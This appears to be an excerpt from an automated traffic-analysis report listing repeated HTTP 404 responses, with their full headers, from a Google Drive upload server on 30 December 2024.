                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC487xoziuVIiBg2PZFi2e7lZM5bZl13ln_V2xCbOJYAiwk0wVJul3rhLeJtO09HdRt0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:44 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-KvHGt2-bJd2g44Aiwv4EFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5D_wel_jO1Ll14h3cmavuzQX0nYDdA6yJY5Jhau4OD6aVl0p81nAeWp_gmEiHoZ7JhG1U6t4oContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:45 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-roQxYdMCqMzyqOh37rxzgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7EVIlzkjxUI1__tV7PE5gdxaHa7nqx8Nd22JRB_7Ek0NQ4GzNyrDZWiBCv-XirqkzZContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:45 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-X5JOnnXIuxziIOsRIDhCpw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7Lde3q0868wBdQ88wcVrVkmR4U-POtGESgJOlo3JZpiTKQ3UEYhNUmaJhrF8i_LRxZeILOlWEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:46 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-xYrjFv4ldXXchJqLpaSkPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC59tvijUtHVyGcfQsjWDaDCmNVKj6thxlPxgloY3nOVjf8qCfRPL-GQwo1yY0GoBc97Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:46 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-4btERR2wdUUQcUaxbeaJlw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5R4oMSnG2e7UNBwiWpSI8TVQw280TCZiwBDlNW_UNTF0kf_IjFMyiexurE0Z63brjKBPYH1WkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:47 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-VOfcs1cMH5lFLJlN7OLsOQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7l4CKu-PGc2ZPPLV6-cnbVskccBrABP6Gmoy3wYrqyCkSbAjGrhcnBNHhY5TZTYp4EContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:47 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-JTMs95eRHsd66gAamLkXXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7z-vNvTIpBCVwFvDoKS6pxBIW0YAmqK1haoWoThZcqDpvJrzFwIYxMbj8a88hqQNxBContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:49 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-th5rsI9IGW7AKNZ2fwc92A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7WfC11_PcMqKMMiLIWnYOeOmFeYunBt0tkKHVLwIl2UTX7Tyq1dI0C5zAdUYqImOQSContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:49 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-A-Sab2VZgPbM9-ctgvSEDg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4sXj9u1A2PAlpJObLIg4uLkEOz3V837VTq4X7islAMooWPUNeIDxbyaWmWtNsSPUpTContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:50 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-GL6s18VaJEvnsL6IObDo6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7GuPr7-kl7YKlJyNwEoH8na3W1f3PDKKTNk3c-JaGKN1Fba3750qQH5luJbVwXdPXZdwjJgA8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:50 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-jPdBrjjLStWX6YDlxX4jcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7KQAnjCyicpptDaywV_HgpUQ46hTPwMv1grwG83K5NxAPJ7JrHda_WDkQjCV7_29MqContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:51 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-81IjRRRVSNKvJI8ASewLlw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4q5UtFVZX0WTIHDwGRUnGBJ04uNk1wfBiJO-FiJ-rGy-3xBH5olKnwHqniGVBMvLjbContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:51 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-aye0TrP4sPHFNoZENbjd0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5iurk22mQ8f-mjnjAKOmfh6bT4msqFcTiMSqywCH4Z45ndD6djT0vZ33_UzPkmtsx8rGhcoygContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:54 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-OoD2vtCNqD00ccs0V0PMQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4hkMR6wq5NGRzjsMFcnfHoohYzMZePXtJzKgGTQvQt7tMW6LotP4-lSKqRRZNfe_2PvpfEYuAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:54 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-1QiqpYdtPT0_GlT4FDp-Eg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5gkwcj0XunA9QYaob3VRTZcSZklFCqqy4cBeU88I6hSm4YFxYP7J0Kgdx6PKvELLeirWIz0AUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:55 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-eGbD1SzMxIC6mAOLC9GR3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Ty_ZVch2HjrtB_rYX3okMaSFj2JcZErnf9hraqQ9au0F77O-ypa-zgErlUSHuD_wMnHH5yggContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:55 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-BZVZ91-2BqMoKjP3vDcqPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6eZJRveoDdKzv8IHeju0J25ypnEjiUYivJqmcA_W55_IuB2mzE-ywZ8hQf_nU9L8ks3NArV4MContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:56 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-rNQxzezGpqkANAeSixjHew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6SrJR-W5CI_3ZtSysrbZblIdBbEJJksSeDtWrUz3lDhczGeYslmWXjS7xlvPK2MhaBu3a8YI0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:56 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-JQk1RWOsEd3f74htEtgLXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC56y6m0UbqdvvXDCHepQLC9R4rVp7eW7XeyEVdgH4CB5WLUVgBgkeKfAj5adv1P1o-X3Vc9jjEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:58 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Mg4avhXlJuserW7No-NMLw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
